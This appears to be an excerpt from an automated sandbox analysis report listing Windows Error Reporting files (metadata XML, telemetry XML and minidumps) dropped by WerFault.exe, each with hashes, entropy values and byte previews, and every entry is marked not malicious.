C:\ProgramData\Microsoft\Windows\WER\Temp\WER76D0.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.7020740304775783
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1F76IxE6Y2D1SUbMGgmf71eUpB989bdiYsf8/Qm:R6lXJ656IxE6YYSUoGgmfJe5oLfS
MD5:	7EE69E6C6EE917413E4CA19A4F8E656E
SHA1:	4C50D095FB40DE3B3AF875DFE9A8BFBBA7BFDC32
SHA-256:	11C9FA643FC11E12518E07E27FFDE2B77154EE6E83CD534BEF600B448B9E3C9C
SHA-512:	7643A9AA113D4627F9DD10701AFD6CA9112EE09759A1F7A181228453C536BD51B3BAAE79D6309D11636219C0A950AF7BC94E592FBA353E9FEA3635E6676914C2
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER770F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.495116178910236
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VY3Ym8M4JcN0Fn+q82F2axhQd:uIjfEI7eK7VvJcIBUaxhQd
MD5:	726F0DC8FBBD3E360CD3442CD14B134D
SHA1:	E78094A5E252A602B55B47C5806CF4E4C697F70A
SHA-256:	651736E027BDEE41EDEDFA56D1CA53F1E39E03784584CCBAF58FB149A4980C3E
SHA-512:	ECBF1B1064E948D7712AC675B03834A6FCFBBE68FE00F71FFD11A71B84E277550916004DAC7FD5F0F24230FAD6063BD312B9D95D4E85AFE5D21178E7AEC1B489
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER78B3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	81592
Entropy (8bit):	2.1372687128163768
Encrypted:	false
SSDEEP:	384:Dn6sXEdzp9EsgYSM2dJr+CCduMP+Pe2XJBvS3/+vfhg+:D6yEdzp9iTfnrO42R2ZB2D
MD5:	DFC0168BB43FDCB0A4F75723F73CD790
SHA1:	C4F435B1D4F6F264967FEE4162DDDCD69D504C44
SHA-256:	EA232681734B86E750F19662CDCE91F6397143645B2A966C5A6840BCDF7165E1
SHA-512:	6AC2D7CA11AEA3F26F258A2759ACD148662F24C172473012023B2C6254D2F5D7B335DD06DDAEA49F0FE076C4A8D118E6A59BA9BDD8B979AAAC103FBA1EDD0AAA
Malicious:	false
Preview:	MDMP..a..... .......5..f........................x...........<...........4....9..........`.......8...........T............".. ...........L...........8...............................................................................eJ..............GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7912.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.7038262671390827
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1FJ6Ixo6Y2DoSUZQGgmf71eUpBRC89bdrYsfxo/Tm:R6lXJ6L6Ixo6Y1SUaGgmfJeQ7xLfxZ
MD5:	61D735E0160C71E4F26E3B2601A0ADE8
SHA1:	D3681131F72BB2087D2DAA41114CEE927D8E4E03
SHA-256:	C3E44D14947218B482CAD12431262406A437CF650EE8508E431E8A0917C19A4B
SHA-512:	5C01E3611D2B973C207B9756E268BF00D8E01BC8573F5750AF8344D2E36CBC49E31F943995E47B855E74E35D9D27077C16EEB9F91CCDFD0741AD4CC277AA0759
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7961.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.493633594787984
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYtYm8M4JcN0F++q82F2axhQd:uIjfEI7eK7VRJcxBUaxhQd
MD5:	A86BA643FA14EBE9D8470628ADF7D769
SHA1:	BD0328A78DAB4AEFBC6F817084637FD5AF121B8F
SHA-256:	A90125BC5D8B77E0C7E1CF54BEFCB104FC58DDD509D1E5EA92014C72809FB776
SHA-512:	159BF97B6803ABFB5C4B50CC7A8912A2265CF1B617F20639B6C8F4AD61721C7A5C522B7A33234B7F3996EF8EEC96FF02441666A842F30A1A045F2CC2F5384978
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B43.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	77024
Entropy (8bit):	2.036815608791457
Encrypted:	false
SSDEEP:	384:veFaETFFRdzppFSTlogYSM6TuMP+PFXOzlBvS3/L0/zh8o6:WceHRdzppFu7TLi2i+zlB20h8N
MD5:	EB663494CAB5FBECC630CE154DD6BC05
SHA1:	8142A3A170352C962CC861317A743C4F379DEDC6
SHA-256:	1A7929A1B73B6690B38E2C47D36CA02AA00F68DC9DCE4225F6AB05A77CFDD1A6
SHA-512:	02B0D339E35C98732694058B860D39A6DF15A5D1BA8B393042D3C6A341E933CCBDCB14558DEC15AAF74906931C1AFC295A97FF576CD473751F559DC591CF3C88
Malicious:	false
Preview:	MDMP..a..... .......5..f....................................<...\|...........":..........`.......8...........T............#..........................................................................................................eJ......<.......GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7BD1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.7041520341356318
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1Fo6IkE6Y2DJSUZQGgmf71eUpB089bdrYsf0e/Tm:R6lXJ6q6IkE6YUSUaGgmfJeCxLfG
MD5:	0E3E79DB32805A7D2593BF7A18F17C64
SHA1:	17F2E05F140BB6D777A9FED812F1292C4C505C85
SHA-256:	9A6C00B42CDF4B4F4140CC9DFD3B47EBE3AAA643C10E072CA8BD794634198541
SHA-512:	D0F738FE451A3BBE111FCD48AB3DA84DC3638E564313B10FF357396F35A3C2EB4EFD132A3D8DC90F26AC49EAD77B6259AAFD17B8343BBFB0B5828C52D890AC5D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C20.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.4946731085358325
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYclYm8M4JcN0FI+q82F2axhQd:uIjfEI7eK7VaJcfBUaxhQd
MD5:	9ADD811C7B57ED0928346C26FC575C0D
SHA1:	D830366F3A95D938CDA385CAA0B79A0BB821F1B9
SHA-256:	637CF1BCFF603D6FFCACB4D983DB1BF884F51ECF831A94E4A2972EAB5B61829B
SHA-512:	0A2D8B89B39E2F92A3A127FAE732F51FD758D1C5026BC8F604B84C848669D468DDD9413C71C15FFFCCF8FA0AF641667CE211CB6172C061AB876FF2EBACD2FAC9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8006.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	90250
Entropy (8bit):	2.2316852298430985
Encrypted:	false
SSDEEP:	384:tY4i29dzpswBeqoZY8MCTH6kaVRa/35ktzSzjca/tpQIydv/S3/kd9+PKcEWIMP:Wj29dzpZwV2CGVDa/pcuzFpx1tPdIW
MD5:	4EE6233D9740B234C1C55B03372E107A
SHA1:	84B84663E796FE62941106623ABD3283804CEB9E
SHA-256:	4EF7B67ED4FC5A353B4EC7B9313BEC9BC5ABFDFCD5FF2DE75F2832A12B88F5AC
SHA-512:	A9B2998B538FAE9527F93C7F42C6599D98DB2710D98FE39C926C25411F0847B9091E7329A6049B3339DECC8E1D0FBC016C1FC2E57BBF0C18AA98FA2E3E7030A6
Malicious:	false
Preview:	MDMP..a..... .......7..f........................P...........<...........T....=..........`.......8...........T............#...<..........T...........@...............................................................................eJ..............GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8094.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8364
Entropy (8bit):	3.704766828145475
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1Fjd6I6Y2D6SUZQigmf71eUpB789bd5Ysfi/5m:R6lXJ65d6I6YHSUKigmfJe/jLfN
MD5:	2AA3D3EBFAE87DA280F7DAE07F59FA07
SHA1:	5977082D0B11C31190D988DAFEE9E24606AEB7B9
SHA-256:	DB3C90C9AEAF39A9FE2278F2B25582A0F94A9D723362ED0B1A8E4F9B76F32979
SHA-512:	672D5C43232F36223CE672C2E5AE7A941C55EB7373C0470D0EA73DD9268CA78CE0717E5B4FE4133115195A35DA93DEE704AB7F2539C2362C18723687F40ECA54
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER80B4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.491894165917654
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VY+KYm8M4JcN0Fi9+q82F2axhQd:uIjfEI7eK7VPjJc9BUaxhQd
MD5:	AC5D548C865E793C957E9EF874B923F4
SHA1:	997137AF95F5A94BD0BCF79CC70E523278E52559
SHA-256:	C74FE733605BF966D5047C9824D9CF39EED559167FF5AD062324D77E5A173CD8
SHA-512:	9F02D32E5EBA422FADE9038E1D9E8795063E43EE3F56D7041E607131081115F7550407CCD5DAD68A5F49BDF1B1E7AD54F87F46AB9D3D1A215F7FB51F7D99E04C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER82E4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	101520
Entropy (8bit):	2.125314516316946
Encrypted:	false
SSDEEP:	384:5t3ObAeyKrdzpVJRHyux7rUYFod9/ziBY99lAwM3Vc2x2O12AXB58S3/TdrqgaPT:PObPzdzpVLHVecovL1TAB3O2/BThaf
MD5:	86A1AF7F98C2B1CC04117BF444F47449
SHA1:	7F59F19E30AB276E9C2A666E43E2977C31AE1281
SHA-256:	DF1C3498FDBD4CFD39E0F001C88DD5810E8FDCA9F5A1923FDB6269BD563697D4
SHA-512:	9772513F0866C18DDB4039DDBA17E25A4F655C303B72AA0A9B74BDB4F98B915171556B26342AA918EC4661C394F7F1A315D6FFEEE823724A56285CCC564D9A0E
Malicious:	false
Preview:	MDMP..a..... .......7..f....................................<...........$...TF..........`.......8...........T............(...d....................... ..............................................................................eJ......@!......GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8382.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8364
Entropy (8bit):	3.703459854365473
Encrypted:	false
SSDEEP:	192:R6l7wVeJM1FZ6XH6Y2DeSUZIbgmf71eUpBRC89bd5YsfL/5m:R6lXJ6L636YzSUSbgmfJeQ7jLfg
MD5:	063514700033556680385C235F7939D9
SHA1:	94A7636B59917664A9D1FC257F1BD356FD3F4859
SHA-256:	04E6AAAFF29C041988ECF7BC08DE1A480F54170C4608F625200CFCCDF0181DD9
SHA-512:	B8F269AC84E3C03F82E167F6A97DFAB87DBAC09227E5B15B653E689850114A7291ACC7066B0A9748B790FA7D107E747593B3E54CFDDA0F9FA9301FF89C595B36
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER83A2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.495698194906987
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9g7WpW8VYuYm8M4JcN0FIX+q82F2axhQd:uIjfEI7eK7VOJcFBUaxhQd
MD5:	05494FC684AAF0910D24B965847F7A7B
SHA1:	E965B0AE3E38484E9286A00A6DCDA07E4444960A
SHA-256:	ACBAAF60C53625137113E758F760E8E069B3E9BB2AB315FC17D6E597B4476B53
SHA-512:	E7A405A5DDBD809EB085BC9B2000194302B4EEAAED9BB45B22D5D31D45BB031F3C02201F5E419D01C180A3D9C76FE2F1A454D4F8254F0E98D469CDEC2EEA6404
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="473961" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8575.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Aug 27 12:19:04 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	99250
Entropy (8bit):	1.9984375959449294
Encrypted:	false
SSDEEP:	384:hsxoU4ELdzpVKN9S/PQYiCFsvT6g0I1yAEp58S3/5yNCFFmEnZy:+xN1LdzpVKrSg1CqvmvRpThFgUZ
MD5:	9480257EF2533DDA846B6DC5E18556BA
SHA1:	34AF65169E40CBF5749DCD5284DB45F8A3549AAB
SHA-256:	CDD941C2159132016643EEF42CA6B16645AFE3F0A8EDE2D1433DEAB26C685AE8
SHA-512:	9D25F5A6E26FAA78F6A323BBF98DD0C17538FE5C229134CAE8A765EA99AE324BE050F7562E07A164222136DB7740BC4459FE0FBCF1C8932A50C4E5DF6D3B23B2
Malicious:	false
Preview:	MDMP..a..... .......8..f............................(.......<................J..........`.......8...........T............*...X..........0 ..........."..............................................................................eJ......."......GenuineIntel............T...........,..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8650.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8368
